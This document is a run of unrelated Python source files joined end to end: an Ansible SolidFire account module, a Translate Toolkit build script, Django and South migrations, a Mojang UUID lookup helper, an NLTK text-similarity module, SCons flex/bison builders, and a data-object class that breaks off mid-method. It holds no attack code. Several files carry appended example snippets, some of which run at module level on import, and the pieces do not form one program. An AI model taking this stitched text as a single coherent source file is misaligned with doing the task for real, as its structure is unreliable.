# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible.  If not, see <http://www.gnu.org/licenses/>.
#

ANSIBLE_METADATA = {'status': ['preview'],
                    'supported_by': 'community',
                    'version': '1.0'}

DOCUMENTATION = '''
module: sf_account_manager

short_description: Manage SolidFire accounts
extends_documentation_fragment:
    - netapp.solidfire
version_added: '2.3'
author: Sumit Kumar ([email protected])
description:
- Create, destroy, or update accounts on SolidFire

options:

    state:
        description:
        - Whether the specified account should exist or not.
        required: true
        choices: ['present', 'absent']

    name:
        description:
        - Unique username for this account. (May be 1 to 64 characters in length).
        required: true

    new_name:
        description:
        - New name for the user account.
        required: false
        default: None

    initiator_secret:
        description:
        - CHAP secret to use for the initiator. Should be 12-16 characters long and impenetrable.
        - The CHAP initiator secrets must be unique and cannot be the same as the target CHAP secret.
        - If not specified, a random secret is created.
        required: false

    target_secret:
        description:
        - CHAP secret to use for the target (mutual CHAP authentication).
        - Should be 12-16 characters long and impenetrable.
        - The CHAP target secrets must be unique and cannot be the same as the initiator CHAP secret.
        - If not specified, a random secret is created.
        required: false

    attributes:
        description: List of Name/Value pairs in JSON object format.
        required: false

    account_id:
        description:
        - The ID of the account to manage or update.
        required: false
        default: None

    status:
        description:
        - Status of the account.
        required: false
'''

EXAMPLES = """
- name: Create Account
  sf_account_manager:
    hostname: "{{ solidfire_hostname }}"
    username: "{{ solidfire_username }}"
    password: "{{ solidfire_password }}"
    state: present
    name: TenantA

- name: Modify Account
  sf_account_manager:
    hostname: "{{ solidfire_hostname }}"
    username: "{{ solidfire_username }}"
    password: "{{ solidfire_password }}"
    state: present
    name: TenantA
    new_name: TenantA-Renamed

- name: Delete Account
  sf_account_manager:
    hostname: "{{ solidfire_hostname }}"
    username: "{{ solidfire_username }}"
    password: "{{ solidfire_password }}"
    state: absent
    name: TenantA-Renamed
"""

RETURN = """

"""

from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.pycompat24 import get_exception
import ansible.module_utils.netapp as netapp_utils


HAS_SF_SDK = netapp_utils.has_sf_sdk()


class SolidFireAccount(object):

    def __init__(self):
        self.argument_spec = netapp_utils.ontap_sf_host_argument_spec()
        self.argument_spec.update(dict(
            state=dict(required=True, choices=['present', 'absent']),
            name=dict(required=True, type='str'),
            account_id=dict(required=False, type='int', default=None),

            new_name=dict(required=False, type='str', default=None),
            initiator_secret=dict(required=False, type='str'),
            target_secret=dict(required=False, type='str'),
            attributes=dict(required=False, type='dict'),
            status=dict(required=False, type='str'),
        ))

        self.module = AnsibleModule(
            argument_spec=self.argument_spec,
            supports_check_mode=True
        )

        p = self.module.params

        # set up state variables
        self.state = p['state']
        self.name = p['name']
        self.account_id = p['account_id']

        self.new_name = p['new_name']
        self.initiator_secret = p['initiator_secret']
        self.target_secret = p['target_secret']
        self.attributes = p['attributes']
        self.status = p['status']

        if HAS_SF_SDK is False:
            self.module.fail_json(msg="Unable to import the SolidFire Python SDK")
        else:
            self.sfe = netapp_utils.create_sf_connection(module=self.module)

    def get_account(self):
        """
            Return account object if found

            :return: Details about the account. None if not found.
            :rtype: dict
        """
        account_list = self.sfe.list_accounts()

        for account in account_list.accounts:
            if account.username == self.name:
                # Update self.account_id:
                if self.account_id is not None:
                    if account.account_id == self.account_id:
                        return account
                else:
                    self.account_id = account.account_id
                    return account

        return None

    def create_account(self):
        try:
            self.sfe.add_account(username=self.name,
                                 initiator_secret=self.initiator_secret,
                                 target_secret=self.target_secret,
                                 attributes=self.attributes)
        except:
            err = get_exception()
            self.module.fail_json(msg='Error creating account %s' % self.name, exception=str(err))

    def delete_account(self):
        try:
            self.sfe.remove_account(account_id=self.account_id)
        except:
            err = get_exception()
            self.module.fail_json(msg='Error deleting account %s' % self.account_id, exception=str(err))

    def update_account(self):
        try:
            self.sfe.modify_account(account_id=self.account_id,
                                    username=self.new_name,
                                    status=self.status,
                                    initiator_secret=self.initiator_secret,
                                    target_secret=self.target_secret,
                                    attributes=self.attributes)
        except:
            err = get_exception()
            self.module.fail_json(msg='Error updating account %s' % self.account_id, exception=str(err))

    def apply(self):
        changed = False
        account_exists = False
        update_account = False
        account_detail = self.get_account()

        if account_detail:
            account_exists = True

            if self.state == 'absent':
                changed = True
            elif self.state == 'present':
                # Check if we need to update the account
                if account_detail.username is not None and self.new_name is not None and \
                        account_detail.username != self.new_name:
                    update_account = True
                    changed = True
                elif account_detail.status is not None and self.status is not None \
                        and account_detail.status != self.status:
                    update_account = True
                    changed = True
                elif account_detail.initiator_secret is not None and self.initiator_secret is not None \
                        and account_detail.initiator_secret != self.initiator_secret:
                    update_account = True
                    changed = True
                elif account_detail.target_secret is not None and self.target_secret is not None \
                        and account_detail.target_secret != self.target_secret:
                    update_account = True
                    changed = True
                elif account_detail.attributes is not None and self.attributes is not None \
                        and account_detail.attributes != self.attributes:
                    update_account = True
                    changed = True
        else:
            if self.state == 'present':
                changed = True

        if changed:
            if self.module.check_mode:
                pass
            else:
                if self.state == 'present':
                    if not account_exists:
                        self.create_account()
                    elif update_account:
                        self.update_account()
                elif self.state == 'absent':
                    self.delete_account()

        self.module.exit_json(changed=changed)


def main():
    v = SolidFireAccount()
    v.apply()


if __name__ == '__main__':
    main()
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2008 Zuza Software Foundation
#
# This file is part of the Translate Toolkit.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, see <http://www.gnu.org/licenses/>.

import os

from tools.mozilla import moz_l10n_builder

MOZDIR = os.path.join(os.path.expanduser('~'), 'mozbuild')


def build_langs(langs, verbose):
    olddir = os.getcwd()
    os.chdir(MOZDIR)
    moz_l10n_builder.main(
        langs=langs, mozcheckout=True, recover=True,
        potpack=True, potincl=['README.mozilla-pot'], popack=True,
        update_trans=True, diff=False, langpack=True, verbose=verbose
    )
    os.chdir(olddir)


def check_potpacks():
    """Copy new and check available POT-packs."""
    pass


def update_rss():
    """Update the RSS feed with the available POT-packs."""
    pass


USAGE = '%(prog)s [<options>] [<lang> ...]'


def create_option_parser():
    """Creates and returns the command-line argument parser."""
    from argparse import ArgumentParser
    parser = ArgumentParser(usage=USAGE)
    parser.add_argument(
        '-q', '--quiet',
        dest='verbose', action='store_false', default=True,
        help='Print as little output as possible.'
    )
    parser.add_argument(
        'langs', nargs='*',
        help='Language codes to build (default: ALL).'
    )
    return parser


def main(langs, verbose):
    if not langs:
        langs = ['ALL']
    if not os.path.isdir(MOZDIR):
        os.makedirs(MOZDIR)
    build_langs(langs, verbose)
    check_potpacks()
    update_rss()


def main_cmd_line():
    """Processes command-line arguments and sends them to main()."""
    args = create_option_parser().parse_args()
    main(args.langs, args.verbose)


if __name__ == '__main__':
    main_cmd_line()
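

# A quick, self-contained check of the command-line interface defined above.
# The argument values are illustrative; nothing here touches the Mozilla
# checkout, it only exercises the parser.
def _cli_parsing_example():
    parser = create_option_parser()
    args = parser.parse_args(['-q', 'af', 'fr'])
    assert args.verbose is False
    assert args.langs == ['af', 'fr']
    return args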
# -*- coding: utf-8 -*-
# Generated by Django 1.10.7 on 2017-09-10 18:01
from __future__ import unicode_literals

import django.core.validators
from django.db import migrations, models


class Migration(migrations.Migration):

    dependencies = [
        ('pootle_store', '0033_remove_store_file'),
    ]

    operations = [
        migrations.AlterField(
            model_name='qualitycheck',
            name='message',
            field=models.TextField(validators=[django.core.validators.MaxLengthValidator(4096)]),
        ),
        migrations.AlterField(
            model_name='unit',
            name='context',
            field=models.TextField(editable=False, null=True, validators=[django.core.validators.MaxLengthValidator(4096)]),
        ),
        migrations.AlterField(
            model_name='unit',
            name='developer_comment',
            field=models.TextField(blank=True, null=True, validators=[django.core.validators.MaxLengthValidator(4096)]),
        ),
        migrations.AlterField(
            model_name='unit',
            name='locations',
            field=models.TextField(editable=False, null=True, validators=[django.core.validators.MaxLengthValidator(4096)]),
        ),
        migrations.AlterField(
            model_name='unit',
            name='translator_comment',
            field=models.TextField(blank=True, null=True, validators=[django.core.validators.MaxLengthValidator(4096)]),
        ),
    ]
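

# The AlterField operations above only attach MaxLengthValidator(4096) to
# existing TextFields; the database column stays TEXT, so the 4096-character
# cap is enforced at validation time (e.g. Model.full_clean()), not by the
# schema.  A minimal sketch of the validator's behaviour, assuming Django is
# installed; the values are illustrative.
def _max_length_validator_example():
    from django.core.exceptions import ValidationError
    from django.core.validators import MaxLengthValidator

    limit = MaxLengthValidator(4096)
    limit('x' * 4096)          # exactly at the limit: passes silently
    try:
        limit('x' * 4097)      # one character over: rejected
    except ValidationError:
        return 'rejected'
    return 'accepted'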
# Shamelessly stolen from https://github.com/Thezomg/mcapi/
# Based on Java from https://github.com/Mojang/AccountsClient/

import requests
import json

from requests.exceptions import ConnectionError


class NoSuchUserException(Exception):
    pass


AGENT = "minecraft"
PROFILE_URL = "https://api.mojang.com/profiles/minecraft"
UUID_PROFILE_URL = 'https://sessionserver.mojang.com/session/minecraft/profile/{uuid}'


class ProfileCriteria(dict):
    def __init__(self, name, agent):
        self['name'] = name
        self['agent'] = agent


def get_profile(uuid, timeout=10):
    """Fetch the session-server profile for a uuid; None on any failure."""
    url = UUID_PROFILE_URL.format(uuid=uuid)
    try:
        r = requests.get(url, timeout=timeout)
        profile = r.json()
    except:
        profile = None
    return profile


def get_uuid(*name, **kwargs):
    """Resolve one or more usernames to profiles via the profiles endpoint."""
    timeout = 10
    if "timeout" in kwargs:
        timeout = kwargs["timeout"]
    if len(name) == 0:
        return None
    p = []
    page = 1
    while True:
        if len(name) == 0:
            break
        # The profiles endpoint accepts at most 100 names per request,
        # so submit the names in chunks of 100.
        crit = name[:100]
        name = name[100:]
        data = json.dumps(crit)
        headers = {'Content-type': 'application/json', 'Accept': 'application/json'}
        r = requests.post(PROFILE_URL, data=data, headers=headers, timeout=timeout)
        profiles = r.json()
        p.extend(profiles)
        page += 1
    return p


def lookup_uuid(username):
    res = get_uuid(username)
    if not res:
        raise ConnectionError()
    for result in res:
        if result.get(u"name", None).lower() == username.lower():
            return result.get(u"id", None)
    raise NoSuchUserException("no user exists with the username '%s'" % username)


def lookup_uuid_name(username):
    res = get_uuid(username)
    if not res:
        raise ConnectionError()
    for result in res:
        if result.get(u"name", None).lower() == username.lower():
            return result.get(u"id", None), result.get(u"name")
    raise NoSuchUserException("no user exists with the username '%s'" % username)


def lookup_name(uuid):
    res = get_profile(uuid)
    if not res:
        raise ConnectionError()
    if not res.get(u'name'):
        raise NoSuchUserException("no user exists with the uuid '%s'" % uuid)
    return res.get(u'name')


def validate_uuid(uuid):
    """A uuid here is 32 hexadecimal characters with no dashes."""
    if len(uuid) != 32:
        return False
    try:
        int(uuid, 16)
    except ValueError:
        return False
    return True


def uuid_type(value):
    if not validate_uuid(value):
        raise TypeError("'%s' is not a valid uuid" % value)
    return value
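

# A minimal usage sketch of the helpers above, assuming the Mojang API is
# reachable; the player name is illustrative.  lookup_uuid() resolves a name
# to a 32-character hex uuid, and lookup_name() goes the other way.
def _example_lookup(username='Notch'):
    try:
        uuid = lookup_uuid(username)
        assert validate_uuid(uuid)
        return uuid, lookup_name(uuid)
    except (NoSuchUserException, ConnectionError) as exc:
        return None, str(exc)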
# -*- coding: utf-8 -*- import datetime from south.db import db from south.v2 import SchemaMigration from django.db import models class Migration(SchemaMigration): def forwards(self, orm): # Adding model 'Item' db.create_table('books_item', ( ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)), ('name', self.gf('django.db.models.fields.CharField')(max_length=50)), ('cost', self.gf('django.db.models.fields.DecimalField')(max_digits=8, decimal_places=2)), ('quantity', self.gf('django.db.models.fields.PositiveIntegerField')(blank=True)), )) db.send_create_signal('books', ['Item']) # Adding model 'Time' db.create_table('books_time', ( ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)), ('task', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['books.Task'], null=True, blank=True)), ('notes', self.gf('django.db.models.fields.CharField')(max_length=1000)), ('rate_per_hour', self.gf('django.db.models.fields.PositiveIntegerField')(blank=True)), ('time', self.gf('django.db.models.fields.PositiveIntegerField')(blank=True)), )) db.send_create_signal('books', ['Time']) def backwards(self, orm): # Deleting model 'Item' db.delete_table('books_item') # Deleting model 'Time' db.delete_table('books_time') models = { 'auth.group': { 'Meta': {'object_name': 'Group'}, 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}), 'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}) }, 'auth.permission': { 'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'}, 'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '50'}) }, 'auth.user': { 'Meta': {'object_name': 'User'}, 'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}), 'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}), 'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}), 'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}), 'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}), 'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}), 'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}), 'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'}) }, 'books.client': { 'Meta': {'object_name': 'Client'}, 'city': 
('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}), 'country': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}), 'email': ('django.db.models.fields.EmailField', [], {'max_length': '100'}), 'first_name': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'last_name': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}), 'organization_name': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'phone': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}), 'postal_code': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}), 'state': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}), 'street_adress': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}) }, 'books.expense': { 'Meta': {'object_name': 'Expense'}, 'author': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}) }, 'books.invoice': { 'Meta': {'object_name': 'Invoice'}, 'author': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}), 'client': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['books.Client']"}), 'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}), 'date_of_issue': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'invoice_number': ('django.db.models.fields.PositiveIntegerField', [], {'blank': 'True'}), 'last_modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'null': 'True', 'blank': 'True'}), 'notes': ('django.db.models.fields.CharField', [], {'max_length': '1000'}), 'terms': ('django.db.models.fields.CharField', [], {'max_length': '1000'}) }, 'books.item': { 'Meta': {'object_name': 'Item'}, 'cost': ('django.db.models.fields.DecimalField', [], {'max_digits': '8', 'decimal_places': '2'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '50'}), 'quantity': ('django.db.models.fields.PositiveIntegerField', [], {'blank': 'True'}) }, 'books.project': { 'Meta': {'object_name': 'Project'}, 'client': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['books.Client']"}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '50'}), 'rate_per_hour': ('django.db.models.fields.PositiveIntegerField', [], {'blank': 'True'}) }, 'books.task': { 'Meta': {'object_name': 'Task'}, 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '50'}), 'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['books.Project']"}), 'rate_per_hour': ('django.db.models.fields.PositiveIntegerField', [], {'blank': 'True'}) }, 'books.tax': { 'Meta': {'object_name': 'Tax'}, 'compound_tax': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '20'}), 'number': 
('django.db.models.fields.PositiveIntegerField', [], {'blank': 'True'}), 'rate': ('django.db.models.fields.PositiveIntegerField', [], {}) }, 'books.time': { 'Meta': {'object_name': 'Time'}, 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'notes': ('django.db.models.fields.CharField', [], {'max_length': '1000'}), 'rate_per_hour': ('django.db.models.fields.PositiveIntegerField', [], {'blank': 'True'}), 'task': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['books.Task']", 'null': 'True', 'blank': 'True'}), 'time': ('django.db.models.fields.PositiveIntegerField', [], {'blank': 'True'}) }, 'contenttypes.contenttype': { 'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"}, 'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}) } } complete_apps = ['books']
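# Hedged sketch of the books/models.py definitions implied by the 'Item' and
# 'Time' tables created by the migration above. It is reconstructed from the
# db.create_table() calls for the same South-era Django, so anything the
# migration does not state (Meta options, __unicode__, related_name) is an
# assumption and omitted here.
from django.db import models


class Item(models.Model):
    name = models.CharField(max_length=50)
    cost = models.DecimalField(max_digits=8, decimal_places=2)
    quantity = models.PositiveIntegerField(blank=True)


class Time(models.Model):
    task = models.ForeignKey('Task', null=True, blank=True)
    notes = models.CharField(max_length=1000)
    rate_per_hour = models.PositiveIntegerField(blank=True)
    time = models.PositiveIntegerField(blank=True)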
import itertools import logging import string import math from retrying import retry import nltk from .encodedEntity import EncodedEntity from .textHelper import removeNonAsciiChars #nltk.download('punkt') #nltk.download('stopwords') #nltk.download('maxent_treebank_pos_tagger') #nltk.download('maxent_ne_chunker') #nltk.download('averaged_perceptron_tagger') #nltk.download('words') def _removePuntuation(text): return text.translate(str.maketrans('','',string.punctuation)) def hasNumbers(inputString): return any(char.isdigit() for char in inputString) def getSentences(text): return nltk.sent_tokenize(text) def getDigitForToken(token): digitsDict = { 'one': '1', 'two': '2', 'three': '3', 'four': '4', 'five': '5', 'six': '6', 'seven': '7', 'eight': '8', 'nine': '9', 'ten': '10', 'eleven': '11', 'twelve': '12', 'thirteen': '13', 'fourteen': '14', 'fifteen': '15', 'sixteen': '16', 'seventeen': '17', 'eighteen': '18', 'nineteen': '19' } return digitsDict.get(token, token) def replaceWordTokensWithDigits(tokens): return [getDigitForToken(token) for token in tokens] def getTokens(text): text = removeNonAsciiChars(text) lowers = text.lower() no_punctuation = _removePuntuation(lowers) tokens = nltk.word_tokenize(no_punctuation) tokens = replaceWordTokensWithDigits(tokens) return tokens def getShingles(text, minLength, maxLength): if text is None: return [] tokens = getTokens(text) shingles = [] for length in range(minLength, maxLength + 1): shingles = shingles + \ [" ".join(tokens[i:i+length]) for i in range(len(tokens) - length + 1)] return shingles def compareUsingShingles(text1, text2): text1ShinglesSet = set(getShingles(text1, 3, 3)) text2ShinglesSet = set(getShingles(text2, 3, 3)) intersection = text1ShinglesSet.intersection(text2ShinglesSet) shorterLen = min(len(text1ShinglesSet), len(text2ShinglesSet)) if shorterLen == 0: return 0 else: denominator = max(shorterLen, 250) comparisionScore = float(len(intersection))/denominator comparisionScore = min(comparisionScore, 1.0) return comparisionScore def compareTitles(title1, title2): title1Tokens = set(getTokens(title1)) title2Tokens = set(getTokens(title2)) intersection = title1Tokens.intersection(title2Tokens) shorterLen = min(len(title1Tokens), len(title2Tokens)) if shorterLen == 0: return 0 else: comparisionScore = float(len(intersection))/shorterLen return comparisionScore @retry(stop_max_attempt_number=3) def getEntitiesInternal(text): if not text: return [] text = removeNonAsciiChars(text) sentences = nltk.sent_tokenize(text) sentences = [nltk.word_tokenize(sent) for sent in sentences] sentences = [nltk.pos_tag(sent) for sent in sentences] entities = [] for sentence in sentences: extractedEntities = nltk.ne_chunk(sentence, binary=True).subtrees( filter = lambda x: x.label() == 'NE') for entity in extractedEntities: newEntity = ' '.join([leaf[0] for leaf in entity.leaves()]) entities.append(newEntity) return list(set(entities)) def getEntities(text): try: return getEntitiesInternal(text) except Exception as e: logging.info("Could not extract entities for text: '%s'", text) return [] def compareEntities(entity1, entity2, doc1EntityWeights, doc2EntityWeights): entity1Weigth = doc1EntityWeights.get(entity1, 0.8) entity1 = EncodedEntity(entity1) entity2Weigth = doc2EntityWeights.get(entity2, 0.8) entity2 = EncodedEntity(entity2) combinedWeight = entity1Weigth * entity2Weigth if entity1.encoded == entity2.encoded: return 1.0 * combinedWeight else: entity1Words = set(entity1.encoded.split()) entity2Words = set(entity2.encoded.split()) commonWords = 
entity1Words.intersection(entity2Words) if len(commonWords) > 0: return combinedWeight * \ float(len(commonWords)*2)/(len(entity1Words) + len(entity2Words)) else: return 0.0 def compareTextEntities(text1, text2, doc1EntityWeights, doc2EntityWeights): text1Entities = set(getEntities(text1)) text2Entities = set(getEntities(text2)) entityPairSimilarities = [compareEntities(x[0], x[1], doc1EntityWeights, doc2EntityWeights) for x in itertools.product(text1Entities, text2Entities)] if len(entityPairSimilarities) == 0: return 0 else: lessNumberOfEntities = min(len(text1Entities), len(text2Entities)) score = float(sum(entityPairSimilarities))/(math.pow(3*lessNumberOfEntities, 0.6)) if (score >= 1.0): return 1.0 else: return score def getImportantSentences(text): sentences = getSentences(removeNonAsciiChars(text)) importantSentences= [] for sentence in sentences: nEntities = len(getEntities(sentence)) if nEntities > 3 and nEntities < 6: importantSentences.append(sentence) elif nEntities == 3: if " said " in sentence or " told " in sentence or hasNumbers(sentence): importantSentences.append(sentence) # Filter out sentences that are too long. importantSentences = [s for s in importantSentences if len(s)<350] # Filter out marketing sentences. wordsToFilter = ['download', 'android'] for wordToFilter in wordsToFilter: importantSentences = [s for s in importantSentences if wordToFilter not in s.lower()] return importantSentences
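# Hedged usage sketch for the similarity helpers above. It assumes the
# package's textHelper module is importable and that the nltk 'punkt'
# tokenizer data has been downloaded (see the commented nltk.download(...)
# calls at the top of the file). The two sentences are illustrative only.
text_a = "The quick brown fox jumps over the lazy dog near the river bank."
text_b = "A quick brown fox jumped over a lazy dog by the river bank."

# 3-word shingle overlap; note the max(shorterLen, 250) denominator keeps
# scores for short texts deliberately small.
print(compareUsingShingles(text_a, text_b))

# Token overlap between titles, normalised by the shorter title's token count.
print(compareTitles("Fox jumps over the dog", "Dog and fox"))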
# -------------------------------------------------------------------------- #
# Copyright 2002-2013, OpenNebula Project (OpenNebula.org), C12G Labs        #
#                                                                            #
# Licensed under the Apache License, Version 2.0 (the "License"); you may    #
# not use this file except in compliance with the License. You may obtain    #
# a copy of the License at                                                   #
#                                                                            #
# http://www.apache.org/licenses/LICENSE-2.0                                 #
#                                                                            #
# Unless required by applicable law or agreed to in writing, software        #
# distributed under the License is distributed on an "AS IS" BASIS,          #
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.   #
# See the License for the specific language governing permissions and        #
# limitations under the License.                                             #
# -------------------------------------------------------------------------- #

import os

import SCons

############
# BUILDERS #
############


def build_lex(target, source, env):
    """Run flex inside the source directory so outputs land next to the .l file."""
    cwd = os.getcwd()
    src = SCons.Util.to_String(source[0])
    src_dir = os.path.dirname(src)
    src_name = os.path.basename(src)

    os.chdir(src_dir)
    os.system("flex " + src_name)
    os.chdir(cwd)
    return None


def emitter_lex(target, source, env):
    # Besides the .c file, flex also produces a header with the same basename.
    src = SCons.Util.to_String(source[0])
    src_dir = os.path.dirname(src)
    (src_name, src_ext) = os.path.splitext(os.path.basename(src))
    target.append(src_name + ".h")
    return target, source


def add_lex(environment):
    """Register the 'Lex' builder (.l -> .c) on the given environment."""
    lex_bld = SCons.Builder.Builder(action=build_lex,
                                    suffix='.c',
                                    src_suffix='.l',
                                    emitter=emitter_lex)
    environment.Append(BUILDERS={'Lex': lex_bld})


def build_bison(target, source, env):
    """Run bison inside the source directory and rename the .hh header to .h."""
    cwd = os.getcwd()
    src = SCons.Util.to_String(source[0])
    src_dir = os.path.dirname(src)
    src_name = os.path.basename(src)
    (base, ext) = os.path.splitext(src_name)

    os.chdir(src_dir)
    os.system("bison " + src_name)
    os.rename(base + ".hh", base + ".h")
    os.chdir(cwd)
    return None


def emitter_bison(target, source, env):
    # Bison also produces a header with the same basename.
    src = SCons.Util.to_String(source[0])
    src_dir = os.path.dirname(src)
    (src_name, src_ext) = os.path.splitext(os.path.basename(src))
    target.append(src_name + ".h")
    return target, source


def add_bison(environment):
    """Register the 'Bison' builder (.y -> .cc) on the given environment."""
    bison_bld = SCons.Builder.Builder(action=build_bison,
                                      suffix='.cc',
                                      src_suffix='.y',
                                      emitter=emitter_bison)
    environment.Append(BUILDERS={'Bison': bison_bld})
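# Hedged usage sketch: how these builders might be wired up inside an
# SConstruct. 'scanner.l' and 'parser.y' are illustrative file names, not
# part of the original build, and Environment() is provided by SCons when
# this runs inside an SConstruct/SConscript (with add_lex/add_bison in scope).
env = Environment()
add_lex(env)       # makes env.Lex available: scanner.l -> scanner.c (+ scanner.h)
add_bison(env)     # makes env.Bison available: parser.y -> parser.cc (+ parser.h)

env.Lex('scanner.l')
env.Bison('parser.y')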
#!/usr/bin/env python # # Copyright 2013 Facebook # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from __future__ import (absolute_import, division, print_function, unicode_literals) import weakref class Raw(object): """Wrapper to tell Object not to rewrap but just store the value""" def __init__(self, value): self.value = value #A Sentinel value because None is a valid value sentinel = object() class Object(dict): """ Pretty DataStructure Objects with lots of magic All Collections added to this object will be converted to data.Collection if they are not already and instance of that type All Dicts added to this class will be converted to data.Object's if they are not currently instances of data.Object To prevent any conversions from taking place in a value place in a data.Object use data.Raw(myobject) to tell data.Object to store it as is. """ #dir(self) causes these to be getattr'ed #Its a weird python artifact __members__ = None __methods__ = None def __init__(self, *args, **kwargs): #Look to see if this object should be somebodies child once not empty if kwargs.get('__PARENT__'): self.__dict__['__PARENT__'] = kwargs.pop('__PARENT__') super(Object, self).__init__(*args, **kwargs) #A place to store future children before they are actually children self.__dict__['__CACHE__'] = weakref.WeakValueDictionary() #Read Only Keys self.__dict__['__PROTECTED__'] = set() #Make sure all children are Object not dict #Also handle 'a.b.c' style keys for k in self.keys(): self[k] = self.pop(k) def __wrap(self, value): if isinstance(value, (tuple, set, frozenset)): return type(value)([self.__wrap(v) for v in value]) elif isinstance(value, list) and not isinstance(value, Collection): return Collection(value, self.__class__) elif isinstance(value, Object): return value # Don't Rewrap if already this class. 
